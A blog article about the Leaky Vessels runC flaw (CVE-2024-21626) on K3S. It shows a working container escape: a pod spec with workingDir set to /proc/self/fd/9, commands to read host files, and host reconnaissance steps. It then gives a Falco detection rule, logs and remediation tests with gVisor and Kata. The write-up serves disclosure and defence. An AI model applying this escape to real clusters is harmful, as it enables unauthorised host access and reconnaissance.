Quest to Cloud Native Computing

Discussion about the Leaky Vessels security vulnerability on K3S


Modified: Fri, 2024-Feb-09


Recently, there is a container security vulnerability called Leaky Vessels (CVE-2024-21626) that could lead to container escaping. With this vulnerability, processes running inside the container may have access to the files on the host system. Several CVEs are related and affects runC, Docker and BuildKits (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652 and CVE-2024-23653). This article focused on CVE-2024-21626, which affects the runC container runtime.

This vulnerability is caused by file descriptor leak in the runC container runtime. With specific conditions or exploit, attackers can leverage this vulnerability to gain read access on the host system or even overwrite files on the host file system (I think it may depend on whether root is used to run the container).

When I heard about this vulnerability, most articles demonstrated on how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see if the vulnerability works on K3S. This is the first time that I saw container escaping vulnerability in real life.

Unpatched version of K3S is affected

K3S uses containerd, which uses the runC runtime. Instead of creating a malicious container image, I tried to set 'workDir' of a pod definition to override the working directory. Below is an example:

apiVersion: v1
kind: Pod
  name: leaky-vessels
    - name: leaky-vessels
      workingDir: /proc/self/fd/9
      command: ["/bin/sh", "-c", "sleep infinity"]
      privileged: false
        allowPrivilegeEscalation: false
            - ALL
        privileged: false
        runAsNonRoot: true
        runAsUser: 1000000000
        runAsGroup: 1000000000
          type: RuntimeDefault

Here, several security measures are enabled for the container system. For example, it is not allowed to run the pod as root. The pod is not allowed to have privilege escalation. The pod is dropping all the Linux capabilities. The pod has also set the seccomp profile. All these measures cannot prevent the Leaky Vessels attack on a vulnerable system.

Next, we did not create a malicious container image and then trick the owner to run the container image. We just override the working directory of the pod to '/proc/self/fd/9'. Depending on the runC versions, it is said the 'working directory' needs needs to set to 'proc/self/fd/n', where n is between 1 to 10.

When the pod is run, we login inside the pod:

        $ kubectl exec -it pod/leaky-vessels -- /bin/sh

 $ pwd

# This is container escaping
# We now have read access to the files on the host of the K3S system

 $ ../../../etc
 $ ls -l hostname
-rw-r--r--    1 root     root            17 Nov 11  2019 hostname

 $ cat hostname

Voila! Here we had it. Once the attacker escaped the container, even without write access, the attacker can do lots of things. The attacker could:

  • Read any files that is readable by the others group owner, including and not limited to:

    • Get the current hostname of the host server

    • Get the OS, Linux distribution of the host server (etc/redhat-release)

    • Get the DNS resolver of the host server

    • Access to the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort)

      • Then the attacks would know what packages is installed on the host

    • Access to proc/route, then the attackers would know the default gateway of the host

    • Access to proc/version, then the attackers would know the kernel version and architecture of the host

    • Access to proc/PID/stat, then the attackers would know some of the PID and process names that the host is running, For example:

              ls -1 */stat |  xargs awk '{print $1 " " $2}' | sort -n -k 1
              # These are PIDs and the process name
      33907 (nginx)
      33908 (nginx)
      33909 (nginx)
      33910 (nginx)
      33911 (nginx)

      Many of the process names of the host system are exposed.

Below is a demostration about the Leaky Vessels attack.

Detecting the Leaky Vessels vulnerability

Snyk releases some eBPF (static and dynamic) detectors:

However, it seems these detectors are designed for runC (Docker based) systems. It is not working for K3S in my testing.

We can use Falco to detect the vulnerability.

Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:

- rule: Possible container escape attempt - Leaky Vessels
  desc: >
    Detecting a container procss that changes the current directory using a procfs file descriptor.
  condition: >
    ( container
    and evt.type = chdir
    and evt.dir = <
    and evt.rawres in (0, 1, 2)
    and evt.arg.path startswith "/proc/self/fd/" )
  output: >
    - Event time [%evt.datetime]
    - Possible container escape attempt detected.
    - Details
    evt.res=%evt.res proc.cwd=%proc.cwd
    proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
    proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
    user.loginuid=%user.loginuid user.loginname=%user.loginname
  priority: WARNING
  tags: [host, container, cve-2024-21626]

Below log is logged to syslog in a single line. For it to be easier to view, I split them up to multiple lines.

        Feb  7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/ --log /run/k3s/containerd/io.containerd.runtime.v2.task/ --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/ babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
user.uid=0 user.loginuid=-1 user.loginname=<NA>
container.privileged=<NA><NA> container.image=<NA><NA> container_location=<NA>:<NA>

Remediation and prevention

  • One should check with vendors and upgrade the vulnerable systems to the patched version (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers and etc.)

  • According to previous readings and articles, RedHat recommended users to configure SELinux in enforcing mode so that these suspicious activities could be blocked

  • Container sandboxing with Google gVisor I tried using the same method (setting workDir) on a older version of Google gVisor and Kata Containers on an unpatched K3S. The 'workDir' method does not work under container sandboxing. These sand boxing techniques provide an isolated environment and reduced the attack surface.

    • Result with Google gVisor

              $ kubectl describe pod/leaky-vessels
      Name:         leaky-vessels
          Container ID:  containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a
            sleep infinity
          State:          Waiting
            Reason:       CrashLoopBackOff
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown
            Exit Code:    128
          Ready:          False
    • Result with Kata Containers

              Name:         leaky-vessels
          Container ID:  containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650
          Port:          <none>
          Host Port:     <none>
            sleep infinity
          State:          Waiting
            Reason:       RunContainerError
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown
            Exit Code:    128
          Ready:          False

Share this article

Related articles

Twitter responses: 1


No. of comments: 0

This site uses Akismet and Google Perspective API to reduce spam and abuses.
Please read and agree the privacy policy before using the comment system.